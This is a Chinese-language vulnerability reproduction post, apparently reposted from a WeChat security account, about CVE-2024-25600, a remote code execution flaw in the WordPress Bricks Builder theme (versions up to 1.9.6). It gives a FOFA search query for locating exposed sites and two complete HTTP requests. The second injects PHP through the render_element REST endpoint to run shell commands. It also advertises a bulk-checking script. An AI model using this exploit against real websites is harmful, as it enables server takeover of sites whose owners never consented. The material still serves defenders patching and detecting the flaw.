漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

admin 2024年2月23日16:40:15评论138 views字数 1243阅读4分8秒阅读模式

免责声明:文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

一:漏洞描述

Bricks Builder是一款面向WordPress网站建设的可视化编辑器,使用简单、功能强大。它提供了多种布局和预设模板,可以帮助用户快速创建专业、美观的网站。该产品存在远程代码执行漏洞。

二:漏洞影响版本

Bricks Builder <= 1.9.6

三:网络空间测绘查询

fofa:body="/wp-content/themes/bricks/"

漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

四:漏洞复现

POC1:

GET / HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeAccept-Encoding: gzip

获取网站nonce值(网站nonce值是一个用于WordPress站点安全性的一次性令牌。"Nonce"代表"Number used Once",即一次性数字。在WordPress中,nonce值通常用于确保表单提交的安全性,以防止跨站请求伪造(CSRF)攻击。每个nonce值只能在特定的操作和时间段内使用,一旦使用过后就会失效。)

漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

POC2:

POST /wp-json/bricks/v1/render_element HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeContent-Length: 356Content-Type: application/jsonAccept-Encoding: gzip{  "postId": "1",  "nonce": "上一步获取的nonce值",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",        "objectType": "post"      }    }  }}

漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

五:批量检测 

漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

关注【Amica安全攻防】公众号,回复关键字python获取批量验证脚本

原文始发于微信公众号(Amica安全攻防):漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日16:40:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)http://cn-sec.com/archives/2519410.html

发表评论

匿名网友 填写信息